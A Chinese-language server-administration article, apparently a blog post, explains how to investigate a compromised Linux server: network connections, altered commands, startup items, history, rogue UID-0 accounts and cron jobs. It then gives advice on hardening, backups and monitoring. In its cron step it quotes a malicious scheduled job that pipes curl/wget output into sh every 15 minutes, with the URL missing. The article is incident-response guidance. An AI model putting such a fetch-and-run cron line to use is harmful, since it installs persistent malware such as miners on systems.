服务器被入侵的案例遇到很多,被植入木马、采矿程序、被恶意登录修改了密码等等,遇到了服务器被入侵的情况应第一时间联系服务商售后处理将损失降低到最低程度,让网站、游戏等业务恢复。

根据多年IDC的经验和你们分享下遇到了服务器被入侵的情况怎么处理及几点加固建议。

服务器被入侵如何排查?

①对被入侵服务器的IP、服务器名称、服务器系统(Linux)、服务器时间进行收集并记录到txt文档中

②检查被入侵服务器的异常网络连接及异常系统进程,主要通过netstat -an以及-antp命令检查。对连接IP进行归属地查询,若是海外IP,记录当前进程的PID值并自动记录PID的所有信息,查询PID所在的文件地址。进程着重检查占用CPU大于30%的,检查异常进程所在文件夹。

服务器被入侵了怎么办?服务器被入侵如何排查?_服务器安全

③检查服务器命令是否被纂改,如用于查看进程的PS命令,查询目录的cd命令,若服务器无法正常使用命令,将会给检查服务器安全造成困扰。

④检查服务器启动项,若服务器被植入木马,即使重启服务器也一样,木马会自动启动。可通过检查init.d文件夹里是否有多余的启动文件和检查时间来判断启动项是否有问题。

服务器被入侵了怎么办?服务器被入侵如何排查?_服务器运维_02

⑤检查服务器的history命令,服务器被入侵都会留下痕迹,SSH登录服务器后,入侵者对服务器操作、执行了哪些恶意命令都可以通过history查询,是否使用wget命令下载木马或者执行S件。

⑥检查服务器的所有账号及当前登录的管理员账户,tty是本地用户登录,pst是远程连接用户登录。也可以检查login.defs文件的uid值,判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户(特权账户,UID值为0)

服务器被入侵了怎么办?服务器被入侵如何排查?_服务器运维_03

⑦检查服务器的定时任务,若是中了采矿程序,CPU会一直跑满,在检查定时任务时会发现每15分钟自动执行下载的命令:crontab -l */15 * * * * (curl -fsSL ||wget -q-O- )|sh 。若是发现定时任务删是删不掉的,可通过检查系统文件找到木马并终止进程,强制删除。服务器被黑后,可以立即检查近2天被修改的文件,可以通过find命令去检查所有的文件,看是否有木马程序。

加固建议

安全防护基本设置

1) 禁用不必要启动的服务与定时任务

2) 修改所有系统用户密码,并满足密码复杂度要求:8位以上,包含大小写字母+数字+特殊符号组合;

3)如非必要禁止SSH端口对外网开放,或者修改SSH默认端口并限制允许访问IP;

定期检查

1、服务器和网站BUG检测,对WebBUG、弱口令、潜在的恶意行为、违法信息等进行定期扫描。

2、代码的定期检查,安全检查,BUG检查。

3、服务器安全加固,安全基线设置,安全基线检查。

4、数据库执行的命令,添加字段、加索引等,必须是经过测试检查的命令,才能在正式环境运行。

数据备份

1、服务器数据备份,包括网站程序文件备份,数据库文件备份、配置文件备份,如有资源最好每小时备份和异地备份。

2、建立五重备份机制:常规备份、自动同步、LVM快照、Azure备份、S3备份。

3、定期检查备份文件是否可用,避免出故障后,备份数据不可用。

4、重要数据多重加密算法加密处理。

5、程序文件版本控制,测试,发布,故障回滚。

安全监控

1、nagios监控服务器常规状态CPU负载、内存、磁盘、流量,超过阈值告警。

2、zabbix或cacti监控服务器常规状态CPU负载、内存、磁盘、流量等状态,可以显示历史曲线,方便排查问题。

3、监控服务器SSH登录记录、iptables状态、进程状态,有异常记录告警。

4、监控网站WEB日志(包括nginx日志php日志等),可以采用EKL来收集管理,有异常日志告警。

5、运维人员都要接收告警邮件和短信,至少所负责的业务告警邮件和短信必须接收,运维经理接收重要业务告警邮件和短信。(除非是专职运维开发)

除服务器内部监控外,最好使用第三方监控,从外部监控业务是否正常(监控URL、端口等),比如:云锁。

感谢您的阅读,服务器大本营-技术文章内容集合站,助您成为更专业的服务器管理员!